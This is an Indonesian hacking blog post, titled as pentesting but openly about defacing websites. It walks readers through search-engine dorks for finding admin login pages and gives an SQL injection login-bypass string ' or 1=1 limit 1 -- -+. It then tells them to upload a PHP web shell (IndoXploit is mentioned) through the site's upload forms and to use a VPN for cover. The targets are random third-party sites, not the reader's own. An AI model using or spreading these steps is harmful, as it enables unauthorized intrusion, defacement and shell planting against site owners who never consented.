<!--<head>
<link href='https://www.blogger.com/static/v1/widgets/4128112664-css_bundle_v2.css' rel='stylesheet' type='text/css'/>
<style type='text/css'>@font-face{font-family:'PT Sans';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/ptsans/v18/jizaRExUiTo99u79D0KEwA.ttf)format('truetype');}@font-face{font-family:'UnifrakturMaguntia';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/unifrakturmaguntia/v22/WWXPlieVYwiGNomYU-ciRLRvEmK7oaVemGZJ.ttf)format('truetype');}</style>
<link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4437712773255039036&zx=e8499b87-25bd-4f1d-bd22-2c2fc35a7e98' media='none' onload='if(media!='all')media='all'' rel='stylesheet'/><noscript><link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4437712773255039036&zx=e8499b87-25bd-4f1d-bd22-2c2fc35a7e98' rel='stylesheet'/></noscript>
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>

</head>-->
<script async='async' src='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9034627681937882",
          enable_page_level_ads: true
     });
</script>
<script async='async' src='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9034627681937882",
          enable_page_level_ads: true
     });
</script>

Home » deface » Hacking » Cara Pentest Web Dengan Bypass Admin

Juan Haniful Kahfi 23.09 deface, Hacking Edit

Cara Pentest Web Dengan Bypass Admin

Exte Team

Deface dengan bypass admin

Halo semua ku datang lagi asique :v, kali ini gw mau share tentang Cara Deface Dengan Bypass Admin

langsung aja dimulai gausah lama - lama, emang mao ngapain lama lama hehe.

Bahan - bahan:

script deface. kalo belum punya bisa donlod disini jangan lupa tuh script lu edit dulu di notepad ea, ya x pake name gua :3
shell. gapunya juga? kere bgt lu jadi heker wkwk canda gan bisa donlod disini password shell IndoXploit ea lu coba aja oc :*
google, bingg, mojila, terserah lu mau pake apa kek internet explorer kek wkwk
vpn, biar apa? biar aman aja :v. pake vpn yg site indo aja, klo site luar mah gausah ngapaen takut :3

1. Dorking

"inurl:/administrator/login.php intext:username site:com"
"inurl:/administrator/login.php"
"inurl:/admin/index.php intext:username"
"inurl:/administrator/login.php intext:username
"inurl:/admin/main.php intext:username"
"inurl:/admin/login.html intext:login"
"inurl:/administrator/index.php intext:login"
"inurl:/adminweb/ intext:login.php"

inurl:admin/login.php site:in

inurl:admin/login.html site:com

inurl:admin/login.aspx site:net ' Kembangin lagi ya dorknya :* '

Gatau cara ngedorking? begini w jelasin cara dorking itu lu pilih salah satu teks diatas terus dicopy. paste kan teks tadi ke pencarian google.

2. Pilih salah satu website yang kalian pilih.
3. Masukin kode injeksi nya gan : ' or 1=1 limit 1 -- -+
taruh kode injeksinya di username dan password, stelah itu klik log in.

4. horee masuk di dashboard :D, itu tandanya lu berhasil masuk jadi admin

5. Cari tempat upload file buat upload shell mu. biasanya ada dibagian gallery,add form,dll

6. cari tempat file shell mu biasanya di http://sitemu.com/files/shellmu.php

Doneeee!!

Oke brada, segitu aja artikel gw wkwk mohon maaf klo ada salah kata yak :v , soalnya biar lu gak stress juga nyari site yg vuln itu kan susah makanya gw kasih candaan y walaupun kriuk ea wkwk.

Thanks for - Ollot2Ghost - and all defacer Indonesia :*

<!--
<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1581542668-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY7RTnn1I_JbjO-IvWcQ9usD0Zabmw:1765567547161';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d4437712773255039036','//www.exteteam.my.id/2017/11/cara-deface-dengan-bypass-admin-login.html','4437712773255039036');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '4437712773255039036', 'title': 'Exte Team                  ', 'url': 'https://www.exteteam.my.id/2017/11/cara-deface-dengan-bypass-admin-login.html', 'canonicalUrl': 'https://www.exteteam.my.id/2017/11/cara-deface-dengan-bypass-admin-login.html', 'homepageUrl': 'https://www.exteteam.my.id/', 'searchUrl': 'https://www.exteteam.my.id/search', 'canonicalHomepageUrl': 'https://www.exteteam.my.id/', 'blogspotFaviconUrl': 'https://www.exteteam.my.id/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Exte Team                   - Atom\x22 href\x3d\x22https://www.exteteam.my.id/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Exte Team                   - RSS\x22 href\x3d\x22https://www.exteteam.my.id/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Exte Team                   - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/4437712773255039036/posts/default\x22 /\x3e\n\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Exte Team                   - Atom\x22 href\x3d\x22https://www.exteteam.my.id/feeds/70855099443705082/comments/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/ce4a0ba1ae8a0475', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Bagikan ke X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Baca selengkapnya', 'pageType': 'item', 'postId': '70855099443705082', 'postImageThumbnailUrl': 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIeQdcMafP90WFutXLqQET0Z6FPvh_vNBssQOKE3voy6xM6c0WDSP1cbO51i9tsutc-XstDIzpacft9fMFMKcbQ585PMP95HU6_JaLV3OudljycVOXlyu_9-aWnxN9AIyXVelNLlP56EH/s72-c/21849145_506489686410318_43655209_n-min+%25281%2529+%25281%2529+%25281%2529+%25281%2529-iloveimg-compressed+%25281%2529+%25281%2529.png', 'postImageUrl': 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIeQdcMafP90WFutXLqQET0Z6FPvh_vNBssQOKE3voy6xM6c0WDSP1cbO51i9tsutc-XstDIzpacft9fMFMKcbQ585PMP95HU6_JaLV3OudljycVOXlyu_9-aWnxN9AIyXVelNLlP56EH/s320/21849145_506489686410318_43655209_n-min+%25281%2529+%25281%2529+%25281%2529+%25281%2529-iloveimg-compressed+%25281%2529+%25281%2529.png', 'pageName': 'Cara Pentest Web Dengan Bypass Admin', 'pageTitle': 'Exte Team                  : Cara Pentest Web Dengan Bypass Admin'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Cara Pentest Web Dengan Bypass Admin', 'description': '      Deface dengan bypass admin     Halo semua ku datang lagi asique :v, kali ini gw mau share tentang Cara Deface Dengan Bypass Admin   la...', 'featuredImage': 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIeQdcMafP90WFutXLqQET0Z6FPvh_vNBssQOKE3voy6xM6c0WDSP1cbO51i9tsutc-XstDIzpacft9fMFMKcbQ585PMP95HU6_JaLV3OudljycVOXlyu_9-aWnxN9AIyXVelNLlP56EH/s320/21849145_506489686410318_43655209_n-min+%25281%2529+%25281%2529+%25281%2529+%25281%2529-iloveimg-compressed+%25281%2529+%25281%2529.png', 'url': 'https://www.exteteam.my.id/2017/11/cara-deface-dengan-bypass-admin-login.html', 'type': 'item', 'isSingleItem': true, 'isMultipleItems': false, 'isError': false, 'isPage': false, 'isPost': true, 'isHomepage': false, 'isArchive': false, 'isLabelSearch': false, 'postId': 70855099443705082}}]);
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2485970545-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/828616780-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'main', document.getElementById('HTML6'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar', document.getElementById('HTML2'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label2', 'sidebar', document.getElementById('Label2'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'sidebar', document.getElementById('Attribution1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar', document.getElementById('Profile1'), {}, 'displayModeFull'));
</script>
</body>-->